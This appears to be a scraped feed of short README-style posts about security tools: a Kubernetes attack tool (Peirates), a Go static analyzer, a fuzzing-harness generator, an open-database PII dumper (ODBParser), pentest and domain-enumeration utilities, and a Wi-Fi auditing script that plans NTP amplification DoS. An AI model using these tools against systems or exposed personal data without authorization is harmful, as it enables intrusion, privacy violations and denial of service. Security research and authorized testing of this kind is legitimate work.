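    "https://kubernetes.default.svc/api/v1/namespaces/default/pods",
    headers={"Authorization": f"Bearer {token}"},
    verify=f"{SA_DIR}/ca.crt",
)
print(resp.status_code, resp.json().get("kind"))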


Where do I run Peirates?

You run Peirates from a container running on Kubernetes.


Does Peirates attack a Kubernetes cluster?

Yes, it absolutely does. Talk to your lawyer and the cluster owners before using this tool in a Kubernetes cluster.


Who creates Peirates?

InGuardians' CTO Jay Beale first conceived of Peirates and put together a group of InGuardians developers to create it with him, including Faith Alderson, Adam Crompton and Dave Mayer. Faith convinced us to all learn Golang, so she could implement the tool's use of the kubectl library from the Kubernetes project. Adam persuaded the group to use a highly-interactive user interface. Dave brought contagious enthusiasm. Together, these four developers implemented attacks and began releasing this tool that we use on our penetration tests.


Do you welcome contributions?

Yes, we absolutely do. Submit a pull request and/or reach out to [email protected].


What license is this released under?

Peirates is released under the GPLv2 license.


Modules

Building and Running

If you just want the peirates binary to start attacking things, grab the latest release from the releases page.

However, if you want to build from source, read on!

Get peirates

go get -v "github.com/inguardians/peirates"

Get library sources if you haven't already (warning: this will take almost a gig of space, because it needs the whole Kubernetes repository):

go get -v "k8s.io/kubectl/pkg/cmd" "github.com/aws/aws-sdk-go"

Build the executable

cd $GOPATH/src/github.com/inguardians/peirates
./build.sh

This will generate an executable file named peirates in the same directory.



Gokart - A Static Analysis Tool For Securing Go Code

13 September 2021 at 11:30
By: Zion3R


GoKart is a static analysis tool for Go that finds vulnerabilities using the SSA (static single assignment) form of Go source code. It is capable of tracing the source of variables and function arguments to determine whether input sources are safe, which reduces the number of false positives compared to other Go security scanners. For instance, a SQL query that is concatenated with a variable might traditionally be flagged as SQL injection; however, GoKart can figure out if the variable is actually a constant or constant equivalent, in which case there is no vulnerability.
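
As a toy illustration of that reasoning (GoKart itself is written in Go and works on SSA; this Python sketch and its names are illustrative only):

from dataclasses import dataclass, field

@dataclass
class Node:
    kind: str                      # "const", "input", or "concat"
    parts: list = field(default_factory=list)

def is_constant_equivalent(node):
    if node.kind == "const":
        return True
    if node.kind == "concat":      # e.g. "SELECT * FROM " + tbl
        return all(is_constant_equivalent(p) for p in node.parts)
    return False                   # user input or anything unknown: tainted

# Concatenating a constant table name: not flagged.
safe = Node("concat", [Node("const"), Node("const")])
# Same concatenation, but the value comes from a request parameter: flagged.
unsafe = Node("concat", [Node("const"), Node("input")])
print(is_constant_equivalent(safe), is_constant_equivalent(unsafe))  # True False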


Why We Built GoKart

Static analysis is a powerful technique for finding vulnerabilities in source code. However, the approach has suffered from being noisy - that is, many static analysis tools find quite a few "vulnerabilities" that are not actually real. This has led to developer friction as users get tired of the tools "crying wolf" one time too many.

The motivation for GoKart was to address this: could we create a scanner with significantly lower false positive rates than existing tools? Based on our experimentation the answer is yes. By leveraging source-to-sink tracing and SSA, GoKart is capable of tracking variable taint between variable assignments, significantly improving the accuracy of findings. Our focus is on usability: pragmatically, that means we have optimized our approaches to reduce false alarms.

For more information, please read our blog post.


Install

You can install GoKart locally by using any one of the options listed below.


Install with go install
$ go install github.com/praetorian-inc/gokart@latest

Install a release binary
  1. Download the binary for your OS from the releases page.

  2. (OPTIONAL) Download the checksums.txt file to verify the integrity of the archive

# Check the checksum of the downloaded archive
$ shasum -a 256 gokart_${VERSION}_${ARCH}.tar.gz
b05c4d7895be260aa16336f29249c50b84897dab90e1221c9e96af9233751f22 gokart_${VERSION}_${ARCH}.tar.gz

$ cat gokart_${VERSION}_${ARCH}_checksums.txt | grep gokart_${VERSION}_${ARCH}.tar.gz
b05c4d7895be260aa16336f29249c50b84897dab90e1221c9e96af9233751f22 gokart_${VERSION}_${ARCH}.tar.gz
  3. Extract the downloaded archive
$ tar -xvf gokart_${VERSION}_${ARCH}.tar.gz
  4. Move the gokart binary into your path:
$ mv ./gokart /usr/local/bin/

Clone and build yourself
# clone the GoKart repo
$ git clone https://github.com/praetorian-inc/gokart.git

# navigate into the repo directory and build
$ cd gokart
$ go build

# Move the gokart binary into your path
$ mv ./gokart /usr/local/bin

Usage

Run GoKart on a Go module in the current directory
# running without a directory specified defaults to '.'
gokart scan <flags>

Scan a Go module in a different directory
gokart scan <directory> <flags> 

Get Help
gokart help

Getting Started - Scanning an Example App

You can follow the steps below to run GoKart on Go Test Bench, an intentionally vulnerable Go application from the Contrast Security team.

# Clone sample vulnerable application
git clone https://github.com/Contrast-Security-OSS/go-test-bench.git
gokart scan go-test-bench/

Output should show some identified vulnerabilities, each with a Vulnerable Function and Source of User Input identified.

To test some additional GoKart features, you can scan with the CLI flags suggested below.

# Use verbose flag to show full traces of these vulnerabilities
gokart scan go-test-bench/ -v

# Use globalsTainted flag to ignore whitelisted Sources
# may increase false positive results
gokart scan go-test-bench/ -v -g

# Use debug flag to display internal analysis information
# which is useful for development and debugging
gokart scan go-test-bench/ -d

# Output results in sarif format
gokart scan go-test-bench/ -s

# Output results to file
gokart scan go-test-bench/ -o gokart-go-test-bench.txt

# Output sarif results to file
gokart scan go-test-bench/ -o gokart-go-test-bench.txt -s

# Scan remote repository (private repos require proper authentication)
# Repository will be cloned locally, scanned and deleted afterwards
gokart scan -r github.com/ShiftLeftSecurity/shiftleft-go-demo -v

# Use remote scan and output flags together for seamless security reviews
gokart scan -r github.com/ShiftLeftSecurity/shiftleft-go-demo -o gokart-shiftleft-go-demo.txt -v

# Use remote scan, output and sarif flags for frictionless integration into CI/CD
gokart scan -r github.com/ShiftLeftSecurity/shiftleft-go-demo -o gokart-shiftleft-go-demo.txt -s

To test out the extensibility of GoKart, you can modify the configuration file that GoKart uses to introduce a new vulnerable sink into analysis. There is a Test Sink analyzer defined in the included default config file at util/analyzers.yml. Modify util/analyzers.yml to remove the comments on the Test Sink analyzer and then direct GoKart to use the modified config file with the -i flag.

# Scan using modified analyzers.yml file and output full traces
gokart scan go-test-bench/ -v -i <path-to-gokart>/util/analyzers.yml

Output should now contain additional vulnerabilities, including new "Test Sink reachable by user input" vulnerabilities.


Run GoKart Tests

You can run the included tests with the following command, invoked from the GoKart root directory.

go test -v ./...


Autoharness - A Tool That Automatically Creates Fuzzing Harnesses Based On A Library

12 September 2021 at 20:30
By: Zion3R


AutoHarness is a tool that automatically generates fuzzing harnesses for you. The idea stems from a persistent problem in fuzzing codebases today: large codebases have thousands of functions, and pieces of code can be embedded fairly deep in the library. It is very hard, or sometimes even impossible, for smart fuzzers to reach those code paths. Even for large fuzzing projects such as oss-fuzz, there are still parts of the codebase that are not covered. Hence, this program tries to alleviate the problem in some capacity, as well as provide a tool that security researchers can use to initially test a codebase. This program only supports codebases written in C and C++.


Setup/Demonstration

This program utilizes LLVM and Clang for libFuzzer, CodeQL for finding functions, and Python for the general program. It was tested on Ubuntu 20.04 with LLVM 12 and Python 3. Here is the initial setup.

sudo apt-get update;
sudo apt-get install python3 python3-pip llvm-12* clang-12 git;
pip3 install pandas lief;  # subprocess, os, argparse and ast ship with Python

Follow the installation procedure for CodeQL on https://github.com/github/codeql. Make sure to install the CLI tools and the libraries. For my testing, I have stored both the tools and libraries under one folder. Finally, clone this repository or download a release. Here is the program's output after running on nginx with the multiple-argument mode set. This is the command I used:

python3 harness.py -L /home/akshat/nginx-1.21.0/objs/ -C /home/akshat/codeql-h/ -M 1 -O /home/akshat/autoharness/ -D nginx -G 1 -Y 1 -F "-I /home/akshat/nginx-1.21.0/objs -I /home/akshat/nginx-1.21.0/src/core -I /home/akshat/nginx-1.21.0/src/event -I /home/akshat/nginx-1.21.0/src/http -I /home/akshat/nginx-1.21.0/src/mail -I /home/akshat/nginx-1.21.0/src/misc -I /home/akshat/nginx-1.21.0/src/os -I /home/akshat/nginx-1.21.0/src/stream -I /home/akshat/nginx-1.21.0/src/os/unix" -X ngx_config.h,ngx_core.h

Results:

It is definitely possible to raise the success rate by further debugging the compilation, adding more header files, and so on. Note that the nginx project does not have any shared objects after compiling. However, this program does have a feature that can convert PIE executables into shared libraries.


Planned Features (in order of progress)

  1. Struct Fuzzing

The current way the program fuzzes functions with multiple arguments is by using a fuzzed data provider. There are some improvements to make in this integration; however, I believe I can incorporate this feature with data structures. A problem I came across when coding this is CodeQL and nested structs: it becomes especially hard without writing multiple queries that vary for every function. In short, this feature needs more work. I was also thinking about a simple solution using protobufs.


  2. Implementation Based Harness Creation

Using CodeQL, it is possible to generate a control flow graph that maps how the parameters in a function are initialized. Using that information, we can create a better harness. Another way is to look for existing uses of the function in the library and use that information to make an educated guess at an implementation of the function as a harness. The problem I currently have with this is generating the control flow graphs with CodeQL.


  3. Parallelized fuzzing/False Positive Detection

I can create a simple program that runs all the harnesses and picks up on any of the common false positives using ASAN. Also, I can create a new interface that runs all the harnesses at once and displays their statistics.


Contribution/Bugs

If you find any bugs with this program, please create an issue. I will try to come up with a fix. Also, if you have any ideas on any new features or how to implement performance upgrades or the current planned features, please create a pull request or an issue with the tag (contribution).


PSA

This tool generates some false positives. Please analyze the crashes first and check whether each one is a valid bug or just a bug in the generated harness. Also, you can enable debug mode if some functions are not compiling; this will help you understand whether there are header files you are missing or any linkage issues. If the project you are working on has no shared libraries but an executable, make sure to compile the executable in PIE form so that this program can convert it into a shared library.


References
  1. https://lief.quarkslab.com/doc/latest/tutorials/08_elf_bin2lib.html


ODBParser - OSINT Tool To Search, Parse And Dump Only The Open Elasticsearch And MongoDB Directories That Have The Data You Care About Exposing

12 September 2021 at 11:30
By: Zion3R


ODBParser is a tool to search for PII being exposed in open databases.

ONLY to be used to identify exposed PII and warn server owners of irresponsible database maintenance
OR to query databases you have permission to access!

PLEASE USE RESPONSIBLY


What is this?

I wrote this because I wanted a one-stop OSINT tool for searching, parsing and analyzing open databases in order to identify leaks of PII on third-party servers. Other tools seem to either only search for open databases, or dump them once you've identified them and then grab data indiscriminately. It grew from a function or two into what's in this repo, so the code isn't as clean and pretty as it could be.


Features

To identify open databases you can:

  • query Shodan and BinaryEdge using all possible parameters (filter by country, port number, whatever); see the sketch after this list
  • specify single IP address
  • load up file that has list of IP addresses
  • paste list of IP addresses from clipboard
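
For illustration, the Shodan side of that discovery step looks roughly like this with the official shodan Python library (pip install shodan); the API key and query are placeholders:

import shodan

api = shodan.Shodan("YOUR_API_KEY")  # placeholder key
# Same idea as the -cn / -p / -t options: filter by country, port and term.
results = api.search('product:"Elastic" port:9200 country:"US" users')
for match in results["matches"]:
    print(match["ip_str"], match["port"])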

Dumping options:

  • parses all databases/collections to identify data you specify
  • grab everything hosted on server
  • grab just one index/collection
  • Use ctrl+c to skip dumping certain index

Post-Processing:

  • convert JSON dumps to CSV
  • remove useless columns from CSV

Other features:

  • keeps track of all the IP addresses and databases you have queried along with info about each server.
  • maintains stats file with number of IP's you've queried, number of databases you've parsed and number of records you've dumped
  • convert JSON dumps you already have to CSV
  • for every database whose total number of records is above your limit, the script will create an entry in a special file along with 5 sample records, so you can review them and decide whether the database is worth grabbing
  • Default output is a line-separated JSON file with a JSON object on each line. You can choose to have it output a "proper JSON" file by using the "properjson" flag
  • You can convert the files to CSV on the fly, or you can convert only certain files after the run is complete (I recommend the latter); a minimal pandas sketch follows this list. Converted JSON files will be moved to a folder called "JSON backups" in the same directory. NOTE: when converting to CSV, the script drops exact duplicate rows and drops columns and rows where all values are NaN, because that's what I wanted to do. Feel free to edit the function if you'd rather have an exact copy of the JSON file.
  • Windows ONLY: if the script pulls back a huge number of indices that have the field you care about, it will list the names of the dbs, pause, and give you ten seconds to decide whether you want to go ahead and pull all the data from every index. I've found that if too many databases come back even after you've specified the fields you want, there is a good chance the data is fake or useless logs, and you can usually tell from the names whether either is the case. If you don't act within 10 seconds, the script will go ahead and dump every index.
  • as you may have noticed, a lot of people have been scanning for MongoDB databases and holding them hostage, often changing the name to something like "TO_RESTORE_EMAIL_XXXRESTORE.COM". The MongoDB scraper will ignore all databases and collections that have been pwned, by checking the name of the DB/collection against a list of strings that indicate pwnage
  • the script is pretty verbose (maybe too verbose), but I like seeing what's going on. Feel free to silence print statements if you prefer.
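
The CSV conversion described above boils down to something like this pandas sketch (file names are placeholders, and the drop rules mirror the NOTE above):

import pandas as pd

# One JSON object per line, as in the default dump format.
df = pd.read_json("dump.json", lines=True)

df = df.drop_duplicates()           # drop exact duplicate rows
df = df.dropna(axis=1, how="all")   # drop columns where all values are NaN
df = df.dropna(axis=0, how="all")   # ...and rows where all values are NaN
df.to_csv("dump.csv", index=False)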

Customization

See the ODBconfig.py file to specify your parameters, because really the name of the game is exposing the data YOU are interested in. I provided some examples in the config file. Play around with them!

You can:

  • specify what index or collection names you want to collect by specifying substrings in config file. For example, if have the term "client", script will pull index called "clients" or "client_data." I recommend you keep these lists blank as you never know what databases you care about will be called and instead specify the fields you care about.
  • specify what fields you care about: if you only want to grab ES indices that have "email" in a field name, e.g."user_emails", you can do that. If you want to make sure the index has at least 2 fields you care about, you can do that too. Or if you just want to grab everything no matter what fields are in there, you can do that too.
  • specify what indices you DON'T want e.g., system index names and others that are generally used for basic logging. Examples provided in config file.
  • override config and grab everything on a server
  • specify output (default is JSON, can choose CSV)
  • set the minimum and maximum database size the script will dump by default; you can also set a flag to override the max doc count on a case-by-case basis.

Installation and Requirements
  • Clone or download to machine
  • Get API keys for Shodan and/or BinaryEdge
  • configure parameters in ODBconfig.py file
  • install requirements from file

I suggest creating a virtual environment for ODBParser so you have no issues with incorrect module versions. Note: tested ONLY on Python 3.7.3 and on Windows 10.

PLEASE USE RESPONSIBLY


Next Steps and Known Issues
  • clean up code a bit more
  • multithread various processes.
  • expand to other db types
  • add other open directory search engines (Zoomeye, etc.)
  • unable to scroll past first page for certain ES instances due to the way ES <2.0 works. Appreciate any help! Pretty sure this is fixed now; open an issue if you get scroll-id errors

Usage
    Examples: python ODBParser.py -cn US -p 8080 -t users --elastic --shodan --csv --limit 100
python ODBParser.py -ip 192.168.2:8080 --mongo --ignorelogs --nosizelimits

Damage to-date: 0 servers parsed | 0 databases dumped | 0 records pulled
_____________________________________________________________________________


optional arguments:
-h, --help show this help message and exit

Query Options:
--shodan, -sh Add this flag if using Shodan. Specify ES or MDB w/
flags.
--binary, -be Add this flag if using BinaryEdge. Specify ES or MDB
w/ flags.
--ip , -ip Query one server. Add port like so '192.165.2.1:8080'
or will use default ports for each db type. Add ES or
MDB flags to specify parser.
--file , -f Load line-separated IPs from file. Add port or will
assume default ports for each db type. Add ES or MDB
flags to specify parser.
--paste, -v Query line-separated IPs from clipboard. Add port or
will assume default ports for each db type, e.g. 9200
for ES. Add ES or MDB flags to specify parser.

Shodan/BinaryEdge Options:
--limit , -l Max number of results per query. Default is
500.
--port , -p Filter by port.
--country , -cn Filter by country (two-letter country code).
--terms , -t Enter any additional query terms you want here, e.g.
'users'

Dump Options:
--mongo, -mdb Use for IP, Shodan, BinaryEdge & Paste methods to
specify parser.
--elastic, -es Use for IP, Shodan, BinaryEdge & Paste methods to
specify parser.
--properjson, -pj Add this flag if you would like output to be a proper JSON
file. Default is one JSON string object per line.
--database , -db Specify database you want to grab. For MDB must be in
format 'db:collection'. Use with IP arg & 'es'
or 'mdb' flag
--getall, -g Get all indices regardless of fields and
collection/index names (overrides selections in config
file).
--ignorelogs Connect to a server you've already checked out.
--nosizelimits, -n Dump index no matter how big it is. Default max doc
count is 800,000.
--csv Convert JSON dumps into CSV format on the fly. (Puts
JSON files in backup folder in case there is issue
with conversion)

CSV/Post-processing Options:
--convertToCSV , -c Convert JSON file or folder of JSON dumps to CSVs
after the fact. Enter full path or folder name in
current working directory
--dontflatten Use if run into memory issues converting JSON files to
CSV during post-processing.
--basic Use with --convertToCSV flag if your JSON dumps are
not true JSON files, but rather line separated JSON
objects that you got from other sources.
--dontclean, -dc Choose if want to keep useless data when convert to
CSV. See docs for more info.


Pollenisator - Collaborative Pentest Tool With Highly Customizable Tools

11 September 2021 at 20:30
By: Zion3R


Pollenisator is a tool that aims to assist pentesters and auditors by automating the use of some tools/scripts and keeping track of them.

  • Written in python 3
  • Provides a model of "pentest objects": Scope, Hosts, Ports, Commands, Tools etc.
  • Tools/scripts are separated into 4 categories : wave, Network/domain, IP, Port
  • Objects are stored in a NoSQL DB (Mongo)
  • Keep links between them to allow queries
  • Objects can be created through parsers / manual input
  • Business logic can be implemented (auto vuln referencing, item triggers, etc.)
  • Many launch conditions for tools/scripts are available to avoid overloading the target or the scanner.
  • A GUI based on tcl/tk

Documentation

Everything is in the wiki, including installation


Features
  • Register your own tools

    • Add command line options in your database.
    • Create your own light plugin to parse your tool output.
    • Use the object models to add, update or delete objects in the pentest inside plugins.
    • Limit the number of parallel execution of noisy/heavy tools
  • Define a recon/fingerprinting procedure with custom tools

    • Choose a period to start and stop the tools
    • Define your scope with domains and network IP ranges.
    • Custom settings to include new hosts in the scope
    • Keep results of all files generated through tools executions
    • Start the given docker to implement numerous tools for LAN and Web pentest
  • Collaborative pentests

    • Split the work between your machines by starting one worker per computer you want to use.
    • Tag IPs or tools to show your teammates that you pwned them.
    • Take notes on every object to keep track of your discoveries
    • Follow tools status live
    • Search all your objects' properties with the filter bar.
    • Get a quick summary of all hosts and their open ports, and check if some are pwned.
  • Reporting

    • Create security defects on IPs and ports
    • Make your plugins create defects directly so you don't have to
    • Generate a Word report of security defects found. You can use your own template with extra work.
    • Generate a Powerpoint report of security defects found. You can use your own template with extra work.
  • Currently integrated tools

    • IP / port recon : Nmap (Quick nmaps followed by thorough scan)
    • Domain enumeration : Knockpy, Sublist3r, dig reverse, crtsh
    • Web : WhatWeb, Nikto, http methods, Dirsearch
    • LAN : Crackmapexec, eternalblue and bluekeep scan, smbmap, anonymous ftp, enum4linux
    • Unknown ports : amap, nmap scripts
    • Misc : ikescan, ssh_scan, openrelay

Roadmap
  • Change the architecture to an API based one
  • Get rid of Celery
  • Add flexibility for commands
  • Improve UX
  • Add more plugin and improve existing ones
  • Add real support for users / authenticated commands


Karta - Source Code Assisted Fast Binary Matching Plugin For IDA

11 September 2021 at 11:30
By: Zion3R


"Karta" (Russian for "Map") is an IDA Python plugin that identifies and matches open-sourced libraries in a given binary. The plugin uses a unique technique that enables it to support huge binaries (>200,000 functions), with almost no impact on the overall performance.

The matching algorithm is location-driven. This means that its main focus is to locate the different compiled files, and to match each file's functions based on their original order within the file. This way, the matching depends on K (the number of functions in the open source) instead of N (the size of the binary), gaining a significant performance boost as usually N >> K.
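
A toy Python sketch of that idea (illustrative names, not Karta's actual code): once a compiled file has been located, each of its functions is matched against a window of the binary's functions in their original order, so the work scales with K rather than N:

def match_file(file_hashes, binary_hashes, anchor):
    """file_hashes: K function fingerprints from one compiled file, in their
    original order. binary_hashes: N fingerprints from the binary. Only a
    window of size K starting at the located anchor is examined."""
    window = binary_hashes[anchor:anchor + len(file_hashes)]
    return {
        fn: anchor + i
        for i, fn in enumerate(file_hashes)
        if i < len(window) and window[i] == fn
    }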

We believe that there are 3 main use cases for this IDA plugin:

  1. Identifying a list of used open sources (and their versions) when searching for a useful 1-Day
  2. Matching the symbols of supported open sources to help reverse engineer a malware
  3. Matching the symbols of supported open sources to help reverse engineer a binary / firmware when searching for 0-Days in proprietary code

Read The Docs

https://karta.readthedocs.io/


Installation (Python 3 & IDA >= 7.4)

For the latest versions, using Python 3, simply git clone the repository and run the setup.py install script. Python 3 is supported from version v2.0.0 onward.


Installation (Python 2 & IDA < 7.4)

As of the release of IDA 7.4, Karta is only actively developed for IDA 7.4 or newer, and Python 3. Python 2 and older IDA versions are still supported using release v1.2.0, which will most probably be the last such version due to Python 2.x end-of-life.


Identifier

Karta's identifier is a smaller plugin that identifies the existence, and fingerprints the versions, of the supported open source libraries within the binary. No more need to reverse engineer the same open-source library again and again: simply run the identifier plugin and get a detailed list of the used open sources (a simplified sketch of the idea follows the list below). Karta currently supports more than 10 open source libraries, including:

  • OpenSSL
  • Libpng
  • Libjpeg
  • NetSNMP
  • zlib
  • Etc.
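
As a rough sketch of the identification concept (not Karta's actual logic): many open sources embed version strings in their compiled binaries, so scanning a binary's bytes for known patterns is often enough to name both the library and its version. The two signature patterns below are illustrative examples only:

# Concept illustration only: identify libraries by embedded version strings.
import re

SIGNATURES = {
    "libpng": re.compile(rb"libpng version (\d+\.\d+\.\d+)"),
    "zlib":   re.compile(rb"deflate (\d+\.\d+\.\d+) Copyright"),
    # Real identifiers (Karta included) use per-library heuristics,
    # not just one regex per project.
}

def identify_open_sources(binary_path):
    with open(binary_path, "rb") as f:
        data = f.read()
    found = {}
    for name, pattern in SIGNATURES.items():
        match = pattern.search(data)
        if match:
            found[name] = match.group(1).decode()
    return found  # e.g. {"libpng": "1.2.29"}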

Matcher

After identifying the used open sources, one can compile a .JSON configuration file for a specific library (libpng version 1.2.29, for instance). Once compiled, Karta will automatically attempt to match the functions (symbols) of the open source in the loaded binary. In addition, if your open source uses external functions (memcpy, fread, or zlib_inflate), Karta will attempt to match those external functions as well.


Folder Structure
  • src: source directory for the plugin
  • configs: pre-supplied *.JSON configuration files (hoping the community will contribute more)
  • compilations: compilation tips for generating the configuration files, and lessons from past open sources
  • docs: sphinx documentation directory

Additional Reading

Credits

This project was developed by me (see contact details below) with help and support from my research group at Check Point (Check Point Research).


Contact (Updated)

This repository was developed and maintained by me, Eyal Itkin, during my years at Check Point Research. Sadly, with my departure from the research group, I will no longer be able to maintain this repository. This is mainly because of the long list of requirements for running all of the regression tests, and the IDA Pro versions that are involved in the process.

Please accept my sincere apology.

@EyalItkin



WWWGrep - OWASP Foundation Web Repository

10 September 2021 at 20:30
By: Zion3R


WWWGrep is a rapid search "grepping" mechanism that examines HTML elements by type and permits focused (single), multiple (file-based URL lists) and recursive (with respect to the root domain or not) searches. Header names and values may also be recursively searched in this manner. WWWGrep was designed to help both breakers and builders quickly examine code bases under inspection; some use cases and examples are shown below.


Installation

git clone 
pip3 install -r requirements.txt
python3 wwwgrep.py <arguments and parameters>

Dependencies (pip3 install -r requirements.txt)

- Python 3.5+
- BeautifulSoup 4
- urllib.parse
- requests_html
- argparse
- requests
- re
- os.path

Breakers
  • Quickly locate login pages by searching for input fields named "username" or "password" on a site using a recursion flag
  • Quickly check headers for the use of specific technologies
  • Quickly locate cookies and JWT tokens by searching response headers
  • Use with a proxy tool to automate recursion through a set of links rapidly
  • Locate all input sinks on a page (or site) by searching for input fields and parameter processing symbology
  • Locate all developer comments on a page to identify commented-out code (or To Do's)
  • Quickly test consistency of site controls implemented during recursion (headers, HSTS, CSP etc)
  • Quickly find vulnerable JavaScript code present in web pages
  • Identify API tokens and access keys present in page code

Builders
  • Quickly test multiple sites under management for the use of vulnerable code
  • Quickly test multiple sites under management for the use of vulnerable frameworks/technologies
  • Find sites which may share a common codebase to determine the impact of flaws/vulnerabilities
  • Find sites which share a common authentication token (header auth token)
  • Find sites which may contain developer comments for server hygiene purposes

Command line switches
wwwgrep.py [target/file] [search_string] [search params/criteria/recursion etc]
Search Inputs

search_string Specify the string to search for or alternatively ""
for all objects of type specified in search parameters

-t --target Specify a single URL as a target for the search
-f --file Specify a file containing a list of URLs to search

Recursion

-rr --recurse-root Limits URL recursion to the domain provided in the target
-ra --recurse-any Allows recursion to extend beyond the domain of the target

Matching Criteria

-i --ignore-case Performs case-insensitive matching (default is to respect case)
-d --dedupe Allow duplicate findings per page (default is to de-duplicate findings)
-r --no-redirects Do not allow redirects (default is to allow redirects)
-b --no-base-url Omit the URL of the match from the output (default is to include the URL)
-x --regex Allows the use of regex matches (search_string is treated as a regex, default is off)
-e --separator Specify an output separator (default is : )
-j --java-render Turns on JavaScript rendering of page objects and text (default is off)
-p --linked-js-on Turns on searching of linked (script src tags) JavaScript (default is off)

Request Parameters

-ps --https-proxy Specify a proxy for the HTTPS protocol in https://<ip>:<port> format
-pp --http-proxy Specify a proxy for the HTTP protocol in http://<ip>:<port> format
-hu --user-agent Specify a string to use as the user agent in the request
-ha --auth-header Specify a bearer token or other auth string to use in the request header

Search Parameters

-s --all Search all page HTML and scripts for terms that match the search specification
-sr --relative Search page links that match the search specification as relative URLs
-sa --absolute Search page links that match the search specification as absolute URLs
-si --input-fields Search page input fields that match the search specification
-ss --scripts Search scripts tags that match the search specification
-st --text Search visible text on the page that matches the search specification
-sc --comments Search comments on the page that match the search specification
-sm --meta Search in page metadata for matches to the search specification
-sf --hidden Search in hidden fields for specific matches to the search specification
-sh --header-name Search response headers for specific matches to the search specification
-sv --header-value Search response header values for specific matches to the search specification

Examples of use:

Find all input fields named login on a site recursively, without leaving the root domain, with case-insensitive matching

wwwgrep.py -t https://www.target.com -i -si "login" -rr

Find all comments containing the term "to do" on all pages in a site

wwwgrep.py -t https://www.target.com -i -sc "to do" -rr

Find all comments on a specific web page

wwwgrep.py -t https://www.target.com/some_page -i -sc ""

Find all hidden fields within a list of web applications contained in the file input.txt using site recursion

wwwgrep.py -f input.txt -sf "" -rr
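
For the curious, the -rr behaviour can be pictured with a minimal, hypothetical sketch built on the listed dependencies (requests, BeautifulSoup 4); this is an illustration of the concept, not WWWGrep's actual implementation:

# Hypothetical illustration of -rr style crawling; not WWWGrep's actual code.
from urllib.parse import urljoin, urlparse
import requests
from bs4 import BeautifulSoup

def crawl_same_domain(start_url, max_pages=50):
    root = urlparse(start_url).netloc
    queue, seen = [start_url], set()
    while queue and len(seen) < max_pages:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        try:
            page = requests.get(url, timeout=5)
        except requests.RequestException:
            continue
        for a in BeautifulSoup(page.text, "html.parser").find_all("a", href=True):
            link = urljoin(url, a["href"])
            # -rr semantics: never leave the root domain of the target.
            if urlparse(link).netloc == root:
                queue.append(link)
    return seen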



EDD - Enumerate Domain Data

10 September 2021 at 11:30
By: Zion3R


Enumerate Domain Data is designed to be similar to PowerView but in .NET. PowerView is essentially the ultimate domain enumeration tool, and we wanted a .NET implementation that we worked on ourselves. This tool was largely put together by viewing implementations of different functionality across a wide range of existing projects and combining them into EDD.


Usage

To use EDD, you just need to call the application, provide the function that you want to run (listed below), and provide any optional/required parameters used by the function.


Functions

The following functions can be used with the -f flag to specify the data you want to enumerate/action you want to take.
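
For example, assuming the compiled assembly is named edd.exe (the binary name here is an assumption):

edd.exe -f getdomainsid
edd.exe -f getdomaincomputers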


Forest/Domain Information
getdomainsid - Returns the domain SID (by default the current domain if no domain is provided)
getforest - Returns the name of the current forest
getforestdomains - Returns the names of all domains in the current forest
convertsidtoname - Converts a SID to the corresponding group or domain name (use the -u option to provide the SID value)
getadcsservers - Gets a list of servers running AD CS within the current domain

Computer Information
getdomaincomputers - Get a list of all computers in the domain
getdomaincontrollers - Gets a list of all domain controllers
getdomainshares - Get a list of all accessible domain shares

User Information
getnetlocalgroupmember - Returns a list of all users in a local group on a remote system
getnetdomaingroupmember - Returns a list of all users in a domain group
getdomainuser - Retrieves info about specific user (name, description, SID, Domain Groups)
getnetsession - Returns a list of accounts with sessions on the targeted system
getnetloggedon - Returns a list of accounts logged into the targeted system
getuserswithspns - Returns a list of all domain accounts that have a SPN associated with them

Chained Information
finddomainprocess - Search for a specific process across all systems in the domain (requires admin access on remote systems)
finddomainuser - Searches the domain environment for a specified user or group and tries to find active sessions (default searches for Domain Admins)
findinterestingdomainsharefile - Searches the domain environment for all accessible shares. Once found, it parses all filenames for "interesting" strings
findwritableshares - Enumerates all shares in the domain and then checks to see if the current account can create a text file in the root level share, and one level deep.
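
As an illustration of the findwritableshares check above (EDD itself is .NET; this sketch is hypothetical Python with names of my own choosing), the probe amounts to attempting a small write in the share root and cleaning up afterwards:

# Hypothetical sketch of a writable-share probe; EDD's real implementation is C#.
import os

def share_is_writable(host, share, probe_name="__probe.txt"):
    probe_path = rf"\\{host}\{share}\{probe_name}"
    try:
        with open(probe_path, "w") as f:
            f.write("probe")       # attempt a write in the share root
        os.remove(probe_path)      # clean up on success
        return True
    except OSError:                # access denied, offline share, etc.
        return False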

References
PowerView - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
CSharp-Tools - https://github.com/RcoIl/CSharp-Tools
StackOverflow - Random questions (if this isn't somehow listed as a reference, we know we're forgetting it :))
SharpView - https://github.com/tevora-threat/SharpView


Owt - The Most Compact WiFi Auditing Tool That Works On Command Line Linux

9 September 2021 at 20:30
By: Zion3R



This tool bundles the necessary tools for Wi-Fi auditing into a Unix bash script with a user-friendly interface. The goal of owt is to have the smallest file size possible while still functioning at maximum proficiency.


Installation & Running the script
~ $ git clone https://github.com/clu3bot/OWT.git
~ $ cd owt
~ $ sudo bash owt.sh

Note: owt requires root privileges

Make sure to allow updates regularly


Usage

Detailed How-to of owt can be found here


Troubleshooting

Troubleshoot.sh will detect possible problems you may have with owt

~ $ cd owt
~ $ sudo bash troubleshoot.sh

owt Premium Edition

Dependencies
  • aircrack-ng
  • mdk3
  • xterm
  • macchanger
  • owt will prompt the user to download these dependencies if they aren't installed.

In The Works
  • Expanding owt beyond wireless network attacking. More information below.
  • Adding more advanced functionality to owt, such as NTP amplification attacks against NTP servers for DoSing websites.
  • Adding AP tracking functionality and the ability to save lists of common saved networks that devices in the area have. E.g. if there is a Starbucks nearby, you can track whether Starbucks is a common AP that phones in the area have as a saved network. This is useful for knowing which APs to spoof.
  • Adding a method of saving text or CSV files of device names and MAC addresses on a network.
  • Making a Windows version of owt.
  • Major UI changes
  • Fixing the "issue" where owt doesn't support use within virtual machines. Not a priority as this is a pain in the ass, but it has been requested :)

History

owt Version History can be found here

Stable Releases Source Code can be found here


All Resources
  • Contact me here
  • Tutorial for owt here
  • owt wiki here
  • Updates/Versions history here
  • Help and Troubleshooting here

Legal Notice

This script is intended to be used on networks you own. Don't use this script maliciously. You are responsible for your own actions.



Graphw00F - GraphQL fingerprinting tool for GQL endpoints

9 September 2021 at 11:30
By: Zion3R

Credits to Nick Aleks for the logo!

How does it work?

